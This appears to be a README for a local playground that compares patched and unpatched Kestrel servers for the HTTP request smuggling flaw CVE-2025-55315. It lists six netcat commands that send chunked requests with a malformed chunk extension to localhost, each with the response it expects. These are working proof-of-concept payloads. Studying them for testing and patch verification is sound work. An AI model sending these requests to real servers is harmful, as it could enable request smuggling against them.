Playground to experiment with different behavior on patched/unpatched Kestrel for the CVE-2025-55315 HTTP smuggling vulnerability
Here are some tests that can be performed against these services to observe different behavior on GET/POST routes between the patched and unpatched versions of Kestrel.
GET against unpatched (sends 200 and socket remains open)
```bash
printf 'GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002
```
GET against patched (sends 200 and socket closes)
```bash
printf 'GET / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001
```
No CT required POST against unpatched (sends 200 and socket remains open)
```bash
printf 'POST / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002
```
No CT required POST against patched (sends 400 and socket closes (process also throws a handled exception about Bad chunk extension))
```bash
printf 'POST / HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001
```
CT required POST against unpatched (sends 415 and socket remains open)
```bash
printf 'POST /ct HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5002
```
CT required POST against patched (sends 415 and socket closes)
```bash
printf 'POST /ct HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: chunked\r\nContent-Type: text/plain\r\n\r\n2;\rxx\r\nxy\r\n0\r\n\r\n' | nc localhost 5001
```
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view